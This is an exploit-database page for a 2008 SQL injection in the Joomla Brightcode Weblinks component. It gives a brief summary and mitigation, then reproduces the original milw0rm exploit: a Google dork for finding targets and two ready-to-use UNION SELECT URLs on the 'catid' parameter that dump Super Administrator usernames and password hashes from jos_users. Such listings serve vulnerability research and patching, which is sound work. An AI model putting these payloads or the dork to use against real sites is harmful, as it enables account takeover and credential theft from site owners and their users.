header-logo
Suggest Exploit
vendor:
Brightcode Weblinks
by:
His0k4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Brightcode Weblinks
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component Brightcode Weblinks Remote SQL injection

A vulnerability in Joomla Component Brightcode Weblinks allows an attacker to execute arbitrary SQL commands via the 'catid' parameter in a 'index.php' call. An attacker can use the 'UNION SELECT' SQL injection technique to extract data from the database, including sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least privileged user account with access to the database.
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/   Joomla Component Brightcode Weblinks Remote SQL injection   \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com__brightweblinks

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
[*] Example2 :   http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
     
----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://www.dz-secure.com
                 http://palcastle.org/cc

# milw0rm.com [2008-07-02]